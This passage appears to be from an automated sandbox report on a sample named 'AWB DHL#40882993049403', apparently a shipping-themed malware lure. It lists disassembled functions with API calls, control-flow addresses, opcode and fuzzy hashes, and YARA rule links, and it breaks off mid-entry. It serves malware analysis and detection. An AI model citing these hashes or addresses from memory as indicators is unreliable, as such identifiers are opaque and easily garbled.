                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: 330d5c7615ca4a0f251dfff94e19a4865ccbb2ed42670b69e134b7ccabc75682
                                            • Instruction ID: 1c06a4772370e1ee25aca4b87f9b5314c05e201061bc5a2bf16d84f8490595b9
                                            • Opcode Fuzzy Hash: 330d5c7615ca4a0f251dfff94e19a4865ccbb2ed42670b69e134b7ccabc75682
                                            • Instruction Fuzzy Hash: A21100BAD002499FCB10CF9AD448A9EFBF4EB88314F10856AE919A7710C375A945CFA5
                                            Function 02D3B218 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 663 2d3b218-2d3b260 664 2d3b262-2d3b265 663->664 665 2d3b268-2d3b297 LoadLibraryExW 663->665 664->665 666 2d3b2a0-2d3b2bd 665->666 667 2d3b299-2d3b29f 665->667 667->666
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02D3B079,00000800,00000000,00000000), ref: 02D3B28A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: e668eabbcd11f9dff95cbe9f6def6228919c43ea612e4dfdb40a5cf01b83654a
                                            • Instruction ID: 5e18d853749a1b991bf9ad785687758f0847bfedde437c96390693e788f8d088
                                            • Opcode Fuzzy Hash: e668eabbcd11f9dff95cbe9f6def6228919c43ea612e4dfdb40a5cf01b83654a
                                            • Instruction Fuzzy Hash: 9C1112BAC003498FDB10CFAAD584BDEFBF4BB48314F10856AD419A7600C374A945CFA5
                                            Function 02D3AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 670 2d3af98-2d3afd8 671 2d3afe0-2d3b00b GetModuleHandleW 670->671 672 2d3afda-2d3afdd 670->672 673 2d3b014-2d3b028 671->673 674 2d3b00d-2d3b013 671->674 672->671 674->673
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02D3AFFE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086938674.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2d30000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 3c7b3ee8e8cce20a6422e8e015e35e37685704f00e5091009ac5bbc841095802
                                            • Instruction ID: 004ffb3b82b2b43fd5a74320c759ce232580aeb64e59324788ba3abce9c08180
                                            • Opcode Fuzzy Hash: 3c7b3ee8e8cce20a6422e8e015e35e37685704f00e5091009ac5bbc841095802
                                            • Instruction Fuzzy Hash: 4E1110B6C002498FCB10CF9AC444BDEFBF4EB88318F10845AD429A7710D375A945CFA1
                                            Function 05A29C57 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 97e40b662bf0c7d7c30851292ac55979293501c09c40c7c9807219c7bb5471d1
                                            • Instruction ID: a6ed44560b4893c7ea233eaa6d9eb45e426aacdf53681b1f8c8e5550266b996c
                                            • Opcode Fuzzy Hash: 97e40b662bf0c7d7c30851292ac55979293501c09c40c7c9807219c7bb5471d1
                                            • Instruction Fuzzy Hash: 6F41A274E05219CFDB08CFE9D4859FEBBB6FF49710F205029E509AB251C7319985DB60
                                            Function 05A29C6E Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: ecdfa8ef68471173a50de539ab47a0bbfa71fb7ded149753e7e12caa33f545f5
                                            • Instruction ID: 90950edbf66a5fc9f72baa195e1bbda9746fcf18a2b2f19ddf6ddb8bf3b94181
                                            • Opcode Fuzzy Hash: ecdfa8ef68471173a50de539ab47a0bbfa71fb7ded149753e7e12caa33f545f5
                                            • Instruction Fuzzy Hash: A731C174E05218CFDB04CFA9D885AEEBBB6BF89700F109029E919AB261C7319945CF50
                                            Function 05A29BDB Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: ce93fc27b96e62264fc2b3f585ad2f1abd93a56b48aa9539af1967f83c50d61a
                                            • Instruction ID: 1126dd25021d0243534454b5ce248c76b8ca9daa4f640a6ce88e11ae9e861af3
                                            • Opcode Fuzzy Hash: ce93fc27b96e62264fc2b3f585ad2f1abd93a56b48aa9539af1967f83c50d61a
                                            • Instruction Fuzzy Hash: 12211970E052588FDB08DFEAC4456EEBFF7AF89700F14842AC419AB358DB705946CB91
                                            Function 05A29BE8 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 57fdea032c88953dcd08afdedac74f41fb7eb43b7252b7c60353d9e804c3412e
                                            • Instruction ID: 64e45171bea647be5143795c8cf7e3c01dba25f12a08ba3410e01bf21cc1abd6
                                            • Opcode Fuzzy Hash: 57fdea032c88953dcd08afdedac74f41fb7eb43b7252b7c60353d9e804c3412e
                                            • Instruction Fuzzy Hash: 6921E7B0E046188BDB08DFEAC5456EEBBF6AF88700F10C02AC419AB358DB701946CB50
                                            Function 05A2EE20 Relevance: .2, Instructions: 190COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce1e4a4bf9074201377fc3d324046b91ca54f57d84159b4027912d4bb17f4829
                                            • Instruction ID: 2731a4a74fa40b449dfafd399674c6bd1571bb14e83a25dde22bd3fa3b52e214
                                            • Opcode Fuzzy Hash: ce1e4a4bf9074201377fc3d324046b91ca54f57d84159b4027912d4bb17f4829
                                            • Instruction Fuzzy Hash: 3651A071B082258FCF15AFBCC455ABEBAB7AB88710F10096DD416AB391DF319E4187A1
                                            Function 05A2F1A8 Relevance: .2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebba2016802cdf900d99fe9d2cceff05e8d1fbcf33837549c3b035a38c7b8f2f
                                            • Instruction ID: 254b69b9d762a782d162c3cf4a3f404d0bb0ba34385d7cf4c35b34ee01473639
                                            • Opcode Fuzzy Hash: ebba2016802cdf900d99fe9d2cceff05e8d1fbcf33837549c3b035a38c7b8f2f
                                            • Instruction Fuzzy Hash: 1151F875B042269FCB18DF7DC8569BEBBF7BF8A200B10846AD455DB351DA348C41CB91
                                            Function 05A2A418 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 198942d831f558044b7d467594764272824c108a939d8c9760bc1f3b7d754d4f
                                            • Instruction ID: 33e91198b75b0da5297dab6fb08cd5e822836a49e898f9b32c5c134591c5692c
                                            • Opcode Fuzzy Hash: 198942d831f558044b7d467594764272824c108a939d8c9760bc1f3b7d754d4f
                                            • Instruction Fuzzy Hash: 93413A74E092188FCB04CFAEC445AFEBBF6AB8C311F14E06AD519A7211D7749941CB64
                                            Function 05A2A40B Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 087ceaa03458c2bbf814dcc8bafc4e290eb12fd529c7842e3dcd71dc68b69950
                                            • Instruction ID: 1bb21498392e82447ef770dd6434a69b04d0870a449d6efcde06a27c127d3203
                                            • Opcode Fuzzy Hash: 087ceaa03458c2bbf814dcc8bafc4e290eb12fd529c7842e3dcd71dc68b69950
                                            • Instruction Fuzzy Hash: F6414D74E09258CFCB04CFADC449ABEBBF6AF89301F14E4A9D909A7251D7749941CB60
                                            Function 05A2A417 Relevance: .1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e87b7b550510abcfe3aadcda5cf663290d5831c762fd46881471cd0d1399cc1f
                                            • Instruction ID: b8cb72da2a378fec9aa787b7fb3925075d34586c945f5b65c17ec2ded7dba010
                                            • Opcode Fuzzy Hash: e87b7b550510abcfe3aadcda5cf663290d5831c762fd46881471cd0d1399cc1f
                                            • Instruction Fuzzy Hash: F7414C74E09218CFCB04CFAEC445AEEBBF6AF8D311F14E06AD919A7251D7748941CB64
                                            Function 05A2A658 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7832abfe71ab3c4cae152fdcb4c9bf4955f8d8c4b525942057b7cd859656a016
                                            • Instruction ID: d5ce6c5d165907ca37e343d141ef8cd4099246416882ecb7da0d9d412433ce70
                                            • Opcode Fuzzy Hash: 7832abfe71ab3c4cae152fdcb4c9bf4955f8d8c4b525942057b7cd859656a016
                                            • Instruction Fuzzy Hash: E93107B4E09219DFCB04CF99C5819AEBBF6FF49310F209599D819AB312C770AA41CB91
                                            Function 05A2F090 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a7583812f8fb0d3718e6a38b42bf93786d5df6b4b96b1a451167e8c8384975d
                                            • Instruction ID: 25d07567240037e08d92457968aa5d5c60c9fbe329c249371ae901417bc64325
                                            • Opcode Fuzzy Hash: 5a7583812f8fb0d3718e6a38b42bf93786d5df6b4b96b1a451167e8c8384975d
                                            • Instruction Fuzzy Hash: B2217E30A141289FDB04EBB9D856AEEBBB3FF8C310F505129D502A7284EF305D45CB66
                                            Function 0144D68C Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086445536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_144d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d34ff761abed5a4d01cee0adef1a03981e8939645b0df2814dae0f81379dc0e7
                                            • Instruction ID: 4f0308576c19e909ba78542f7b0cf39c78921d49a71abf5a63469254eb7cb841
                                            • Opcode Fuzzy Hash: d34ff761abed5a4d01cee0adef1a03981e8939645b0df2814dae0f81379dc0e7
                                            • Instruction Fuzzy Hash: BE2106B1904280DFEB06DF94D9C4B17BFA5FB98314F24866AE9090B366C33AD416CB61
                                            Function 0144D1FC Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086445536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_144d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10b6bb8ddfa926b4c776b1555fa959f5a299bbde47fb488e93d2eb00f78d3be1
                                            • Instruction ID: bffd718c41b61fa79485a84ed514f4f7ee3f821230064eebd534590bbd281aef
                                            • Opcode Fuzzy Hash: 10b6bb8ddfa926b4c776b1555fa959f5a299bbde47fb488e93d2eb00f78d3be1
                                            • Instruction Fuzzy Hash: B721C4B1904240DFEB05DF98D9C4B2BBFA5FB98324F24C56AED050A266C336D416CBA1
                                            Function 0144D4C4 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086445536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_144d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a78bd278807143c4dde892c6c156a98d6b473b2cf413e41568230d2fdb94386
                                            • Instruction ID: 3990e41f14d7937084c3c2ef9e0439b32decc27c29b466956db2790e25854508
                                            • Opcode Fuzzy Hash: 2a78bd278807143c4dde892c6c156a98d6b473b2cf413e41568230d2fdb94386
                                            • Instruction Fuzzy Hash: 2F21D3B1A04240EFEB05DF58D9C0B27BF65FB98318F24C56AE9090B366C736D456CAA1
                                            Function 05A2A5A0 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d81c3ed88cdff968f2c399a55e0c663c615f4199e1b0a337f945615cc66ec4c8
                                            • Instruction ID: 560bb3ebbf9734f3e4c0467ad1e7569ed41a925c066507da6725a702f1b713c4
                                            • Opcode Fuzzy Hash: d81c3ed88cdff968f2c399a55e0c663c615f4199e1b0a337f945615cc66ec4c8
                                            • Instruction Fuzzy Hash: B8312CB4D09259DFCB40DFA8C1829AEBBF5FF49310F20919AD419A7752D7709E40CBA1
                                            Function 0145D1D4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086513930.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_145d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 116131a3edaa7a463d9f472c1a926a92067e4af3a8e91324c024a0371690c9c4
                                            • Instruction ID: 08204549dc27e7e60282461429b07622abfb97a931606ba7b87610ac1196bd0c
                                            • Opcode Fuzzy Hash: 116131a3edaa7a463d9f472c1a926a92067e4af3a8e91324c024a0371690c9c4
                                            • Instruction Fuzzy Hash: 3721CFB1904200AFDB45DF98D9C0B26BBA5FF84324F24C96EED094B363C776D446CA61
                                            Function 0145D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086513930.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_145d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64ca21858661e6aa5e6c894d152539cf6be31196de3952fd20ddd66507545575
                                            • Instruction ID: c35c7c5bc6b2d686dcf0b98092c0cba1df5f2f321639248c0a1062f1a32011db
                                            • Opcode Fuzzy Hash: 64ca21858661e6aa5e6c894d152539cf6be31196de3952fd20ddd66507545575
                                            • Instruction Fuzzy Hash: 7A21FFB1A04200EFDB55DF58D980B26BBA5EF84718F24C56ADD0A4B367C33AD407CA61
                                            Function 05A2FE98 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b82c38a825d06aee8b69fd78565cafce328f55df396635a8ea850683f40d8b1c
                                            • Instruction ID: 1b5c30cb2e6ff44e4d92149169e933ed3fd575d660d01d1ff5a57735d5f2397a
                                            • Opcode Fuzzy Hash: b82c38a825d06aee8b69fd78565cafce328f55df396635a8ea850683f40d8b1c
                                            • Instruction Fuzzy Hash: F431E674E042599FCB04DFA8D4959EDBBF1FF89310F10802AE915A7350DB30A940CFA0
                                            Function 05A25A74 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 410d40b1af05a3119188c042476c539b5a1a6310db4f71cacec7fa63a3d0e32a
                                            • Instruction ID: e66ace16a118cd5a0e485634c7aa828eb70aa5d5971fc9c7646b1a2cfccad3f5
                                            • Opcode Fuzzy Hash: 410d40b1af05a3119188c042476c539b5a1a6310db4f71cacec7fa63a3d0e32a
                                            • Instruction Fuzzy Hash: B611E670B0A3489FCB05DB78CD569AE7BF5EF46200B2548EBD845CB242EA24CD058722
                                            Function 0145D005 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086513930.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_145d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ebcdd58dfdde5eee3be7a0b742821b8af84a8413cc9b9b180636bb351a7ab6e2
                                            • Instruction ID: c8f289e26888ed633ed1b787028744af97914e3a788dbc0fd63d4e2fbefa4558
                                            • Opcode Fuzzy Hash: ebcdd58dfdde5eee3be7a0b742821b8af84a8413cc9b9b180636bb351a7ab6e2
                                            • Instruction Fuzzy Hash: F62183755083809FDB03CF64D994716BF71EF46214F28C5DAD8498F2A7C33A9816CB62
                                            Function 05A2E418 Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 998df8fde9f11cb1374c15f180490391c07b96f2d97c900eda49eea6557500ff
                                            • Instruction ID: 9742d18ea43354d754127bb7a92b9d9d282daa62a61c37a91b31d004b033dfd0
                                            • Opcode Fuzzy Hash: 998df8fde9f11cb1374c15f180490391c07b96f2d97c900eda49eea6557500ff
                                            • Instruction Fuzzy Hash: AE119130B001258BCB28DF7D9811A7B7BBBBB84B60F048569EA1697390EB31898087D0
                                            Function 05A27461 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e17cb9258e76d4214b59bc983ad9e5ea2645c5a2e2a37507d163a70136da20f
                                            • Instruction ID: 8241a9a73602a1d1ab78ad31ddddabf1fc990647cc7d7629bc38644abca3ddd6
                                            • Opcode Fuzzy Hash: 7e17cb9258e76d4214b59bc983ad9e5ea2645c5a2e2a37507d163a70136da20f
                                            • Instruction Fuzzy Hash: 7D11CE31A44614CFE715CB2CC956F647FA2FF46714F9A84E9E2558F272D622E802CB01
                                            Function 05A2AAE0 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 06ea7c8538230d3f220fd02a357fb3a91a9b865fd0224beb6f601a07497fecfa
                                            • Instruction ID: 2bbda7cd1d4dc500fac98b8205db66b03ddf3ee99850b92d643fb2fe9fad80a0
                                            • Opcode Fuzzy Hash: 06ea7c8538230d3f220fd02a357fb3a91a9b865fd0224beb6f601a07497fecfa
                                            • Instruction Fuzzy Hash: 4E213B70D056588BDB09DFABC8456EEFFB7AFCA300F04C46AD409A6265DB740945CF60
                                            Function 05A2A5B0 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b86094f2f130b999f2e633d69526a20deb8cf4f79b1b4065930cea859f0574f
                                            • Instruction ID: a6eee3c7625bed7a7da6ea06182ff51868d99602d449144001eae6d2f872988a
                                            • Opcode Fuzzy Hash: 0b86094f2f130b999f2e633d69526a20deb8cf4f79b1b4065930cea859f0574f
                                            • Instruction Fuzzy Hash: F921D8B4E09219DFCB44CFA9C1819AEBBF9FB48310F609169D419A7711D770AE40CFA1
                                            Function 0144D687 Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086445536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_144d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 235392520c3f1e7e09b6d89c66da8016760e9a9590b2b0d78f6be887e7f5212d
                                            • Instruction ID: e55f3685d01c462e031f9d18f3600a2f88d515497826d042667980ef3cf4b160
                                            • Opcode Fuzzy Hash: 235392520c3f1e7e09b6d89c66da8016760e9a9590b2b0d78f6be887e7f5212d
                                            • Instruction Fuzzy Hash: A021DF76904280DFDB06CF44D9C4B16BF72FB98314F24C6AAD9480B266C33AD426CB91
                                            Function 0144D1F7 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086445536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_144d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 137f5766051e4324e45f0217ede9c43a14289fab1ea42f994ba2cff73d56ee7c
                                            • Instruction ID: c54c72bb3e7727e9bbae6d0220fe564d2fddd579941e554c1777df7016774229
                                            • Opcode Fuzzy Hash: 137f5766051e4324e45f0217ede9c43a14289fab1ea42f994ba2cff73d56ee7c
                                            • Instruction Fuzzy Hash: F221AF76904240DFEB06CF54D9C4B16BF72FB94324F24C5AADD490B666C33AD42ACBA1
                                            Function 0144D4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2086445536.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_144d000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                            • Instruction ID: 718fc95468650a92653401797be257870dc620f3a31b997fe755fb87dc444501
                                            • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                            • Instruction Fuzzy Hash: DF11E172904280CFDB02CF54D9C4B16BF71FB94314F24C6AAD8490B766C336D45ACBA1
                                            Function 05A25AEC Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98b7323b3bcaac9cf0046457d0a1de14e516d77dbf14a6261b7d6ebba5680909
                                            • Instruction ID: 55f3849572ce7862887fad7d27c2e9a916ae076bf92490091ab768d623519a12
                                            • Opcode Fuzzy Hash: 98b7323b3bcaac9cf0046457d0a1de14e516d77dbf14a6261b7d6ebba5680909
                                            • Instruction Fuzzy Hash: 3E2100B5C003499FCB10CF9AD884ADEBBF4FB48310F10842AE919A7210C375A954CFA1
                                            Function 05A2AAF0 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2089942706.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5a20000_AWB DHL#40882993049403.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8ac581797654217e5dc58c94dd3a688ebc2da0ff4e55156f444c710f83d967f2
                                            • Instruction ID: e2b196d5a2ab67875cf4dfee1b83b7f896fa7a5394616355e46aa9ec7b000968
                                            • Opcode Fuzzy Hash: 8ac581797654217e5dc58c94dd3a688ebc2da0ff4e55156f444c710f83d967f2
